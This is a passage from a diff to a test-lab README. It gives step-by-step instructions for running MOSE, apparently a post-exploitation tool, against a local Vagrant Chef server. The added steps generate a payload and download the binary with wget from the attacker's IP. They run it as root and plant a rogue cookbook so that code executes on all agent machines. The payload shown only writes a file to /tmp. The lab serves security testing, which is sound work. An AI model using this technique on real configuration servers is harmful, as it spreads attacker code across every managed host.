l50/temp-chef-test-lab/README.md

 8. For this example, you should note that a file has been created in `/tmp` in all of the chef-agent virtual machines, as we specified in step 2.

 To run MOSE against the chef server:
+1. Build MOSE using `make build` in the MOSE repo
+2. Generate a payload with MOSE: `./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t chef -l <your local ip address> -ep 9090`
+3. Login to the chef server: `vagrant ssh chef_server` (the password is vagrant)
+4. Escalate to root with `sudo su`
+5. Download the binary from MOSE: `wget http://YOURIPADDRESSGOESHERE:8090/chef-linux`
+6. Back on the attacker's system, specify `n` for the target being a workstation and `Y` when prompted for the target being a server
+7. Run the payload: `chmod +x chef-linux; ./chef-linux`
+8. Use the container that is spawned on the attacking machine as if it were a workstation to get the rogue cookbook into place
+9. Wait for 30 minutes or ssh into one of the agents and kick off the payload manually: `vagrant ssh chef_agent_1` (the password is vagrant)
+	7a.
+Escalate to root with ```sudo su```
+	7b.
+Run ```chef-client```
+10. For this example, you should note that a file has been created in `/tmp` in all of the chef-agent virtual machines, as we specified in step 2.

 To tear down the test environment, run the following command:
 ```